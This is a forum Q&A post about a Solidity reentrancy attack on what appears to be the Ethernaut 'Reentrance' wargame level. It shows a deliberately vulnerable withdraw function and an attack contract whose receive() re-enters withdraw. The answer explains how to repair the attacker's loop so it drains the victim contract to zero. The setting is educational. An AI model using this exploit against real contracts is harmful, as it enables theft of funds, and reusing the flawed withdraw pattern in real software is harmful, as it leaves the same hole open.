# How does the receive function in solidity work

Tags: solidity, remix, reentrant-attacks

The below code block has a Reentrance contract and also a attack contract. Imagine the Reentrance contract already has some balance in it. Aim to to drain it to 0.
But the if condition in the receive is not triggered and the balance of the Reentrance contract never reaches zero.

```
// SPDX-License-Identifier: MIT
pragma solidity >0.6.12;

import "@openzeppelin/contracts/utils/math/SafeMath.sol";

contract Reentrance {
  
  using SafeMath for uint256;
  mapping(address => uint) public balances;

  function donate(address _to) public payable {
    balances[_to] = balances[_to].add(msg.value);
  }

  function balanceOf(address _who) public view returns (uint balance) {
    return balances[_who];
  }

  function withdraw(uint _amount) public {
    if(balances[msg.sender] >= _amount) {
      (bool result,) = msg.sender.call{value:_amount}("");
      if(result) {
        _amount;
      }
      balances[msg.sender] -= _amount;
    }
  }

  receive() external payable {}
}

contract attack{

    Reentrance ct;
    address ataddr;
    uint public curbal;
    
    constructor(address payable _ct){

         ct=Reentrance(_ct);
         ataddr=_ct;
    }
    
    function donate() public payable {
        
        ct.donate{value:msg.value}(address(this));
    }

    function attackit(uint amt) public {
        ct.withdraw(amt);
    }

    receive() external payable{
          curbal=address(ct).balance;
           if(curbal>0)
           {  
                uint bal=address(ct).balance;
                ct.withdraw(bal);
           }
    }

}
```

Answer (score 0):

`receive()`activates when other contracts send ethers without msg.data. In attack, we know that reentrance contract's balance is larger than 0 (ethernaut's initial setup), so  `receive()` will execute `withdraw()`. But the issue is in `receive()` you should withdraw the amount(msg.value) you sent previously through `donate()`, instead of withdrawing the total balance of the reentrance. This is to make sure when `receive()` executes `withdraw()`, it will pass the require statement again then send the attacker the same amount creating a loop. The loop stops when reentrance balance is 0.

See detailed explanation:
https://medium.com/coinmonks/ethernaut-lvl-10-re-entrancy-walkthrough-how-to-abuse-execution-ordering-and-reproduce-the-dao-7ec88b912c14

Comment: Thanks, got my mistake. The edit in withdraw function with the target amount. made the hack